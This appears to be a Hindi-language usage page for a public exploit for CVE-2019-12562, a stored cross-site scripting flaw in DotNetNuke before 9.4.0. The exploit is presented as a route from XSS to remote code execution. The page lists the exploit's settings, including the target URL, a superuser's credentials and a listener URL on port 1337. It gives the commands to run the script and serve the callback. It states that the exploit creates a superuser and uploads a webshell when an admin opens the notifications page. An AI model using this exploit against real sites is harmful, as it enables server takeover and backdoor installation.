
DotNetNuke (DNN) 9.4.0 से पहले के संस्करण में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग | XSS से RCE
CVE-2019-12562
DotNetNuke (DNN) के 9.4.0 से पहले के संस्करण में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (Stored Cross-Site Scripting) दूरस्थ हमलावरों को दुर्भावनापूर्ण स्क्रिप्ट को एडमिन नोटिफिकेशन पेज में संग्रहीत करने और एम्बेड करने की अनुमति देती है। इस एक्सप्लॉइट का उपयोग व्यवस्थापक विशेषाधिकारों के साथ कोई भी कार्य करने के लिए किया जा सकता है, जैसे सामग्री प्रबंधित करना, उपयोगकर्ताओं को जोड़ना, सर्वर पर बैकडोर अपलोड करना, आदि। सफल शोषण तब होता है जब कोई एडमिन उपयोगकर्ता संग्रहीत क्रॉस-साइट स्क्रिप्टिंग वाले नोटिफिकेशन पेज पर जाता है।
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
यह एक्सप्लॉइट एक सुपरयूज़र बनाएगा और लक्ष्य सर्वर पर एक वेबशेल अपलोड करेगा
एक्सप्लॉइट शर्त: सफल शोषण तब होता है जब कोई एडमिन उपयोगकर्ता नोटिफिकेशन पेज पर जाता है।